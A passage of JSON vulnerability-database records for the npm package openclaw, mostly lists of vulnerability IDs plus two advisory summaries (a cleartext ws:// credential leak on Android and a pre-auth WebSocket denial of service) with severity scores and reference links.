a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf
5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd
1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2ua
w"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mke
p"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.2"}],"aliases":["CVE-2026-22181","GHSA-8mvx-p2r9-r375"],"risk_score":3.4,"exploitability":"0.5","weighted_severity":"6.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-34hg-6fw2-wfax"},{"url":"http://public2.v
ulnerablecode.io/api/vulnerabilities/89946?format=json","vulnerability_id":"VCID-356u-h788-pkgt","summary":"OpenClaw: Android accepted cleartext remote gateway endpoints and sent stored credentials over ws://\n## Summary\n\nBefore OpenClaw 2026.4.2, Android accepted non-loopback cleartext `ws://` gateway endpoints and would send stored gateway credentials over that connection. Discovery beacons or setup codes could therefore steer the client onto a cleartext remote endpoint.\n\n## Impact\n\nA user who followed a forged discovery result or scanned a crafted setup code could disclose stored gateway credentials to an attacker-controlled endpoint in plaintext. This was a transport-security bug in the Android gateway client.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `a941a4fef9bc43b2973c92d0dcff5b8a426210c5` — require TLS for remote Android gateway endpoints\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. 
Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @zsxsoft for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40045","reference_id":"","reference_type":"","scores":[{"value":"6e-05","scoring_system":"epss","scoring_elements":"0.00423","published_at":"2026-06-07T12:55:00Z"},{"value":"6e-05","scoring_system":"epss","scoring_elements":"0.00428","published_at":"2026-06-06T12:55:00Z"},{"value":"6e-05","scoring_system":"epss","scoring_elements":"0.00427","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40045"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/a941a4fef9bc43b2973c92d0dcff5b8a426210c5","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:37:33Z/"}],"url":"https://github.com/openclaw/openclaw/commit/a941a4fef9bc43b2973c92d0dcff5b8a426210c5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-83f3-hh45-vfw9","ref
erence_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:37:33Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-83f3-hh45-vfw9"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40045","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40045"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-cleartext-credential-transmission-via-unencrypted-websocket-gateway-endpoints","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:37
:33Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-cleartext-credential-transmission-via-unencrypted-websocket-gateway-endpoints"},{"reference_url":"https://github.com/advisories/GHSA-83f3-hh45-vfw9","reference_id":"GHSA-83f3-hh45-vfw9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-83f3-hh45-vfw9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109939?format=json","purl":"pkg:npm/openclaw@2026.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulner
ability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"}],"aliases":["CVE-2026-40045","GHSA-83f3-hh45-vfw9"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","re
source_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-356u-h788-pkgt"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91523?format=json","vulnerability_id":"VCID-37ep-9smd-zuh9","summary":"OpenClaw: Gateway WebSocket Denial of Service via unbounded pre-auth upgrades\n## Summary\n\nThe gateway accepted unbounded concurrent unauthenticated WebSocket upgrades before allocating them to an authenticated session budget.\n\n## Impact\n\nAn unauthenticated network attacker could consume socket and worker capacity and disrupt WebSocket availability for legitimate clients.\n\n## Affected Component\n\n`src/gateway/server-http.ts, src/gateway/server/preauth-connection-budget.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `cb5f7e201f` (`gateway: cap concurrent pre-auth websocket upgrades`).\n\nDiscovered by: Topsec AlphaLab (wang dong)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41399","reference_id":"","reference_type":"","scores":[{"value":"0.00102","scoring_system":"epss","scoring_elements":"0.27671","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00102","scoring_system":"epss","scoring_elements":"0.27584","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00102","scoring_system":"epss","scoring_elements":"0.27621","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41399"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/cb5f7e201f3f86ad70e199ef850e636b4cc457ba","reference_id":"","reference_type":
"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/cb5f7e201f3f86ad70e199ef850e636b4cc457ba"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f44p-c7w9-7xr7","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f44p-c7w9-7xr7"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41399","reference_id":"CVE-2026-41399","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41399"},{"reference_url":"https://github.com/advisories/GHSA-f44p-c7w9-7xr7","reference_id":"GHSA-f44p-c7w9-7xr7","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-f44p-c7w9-7xr7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"
VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"
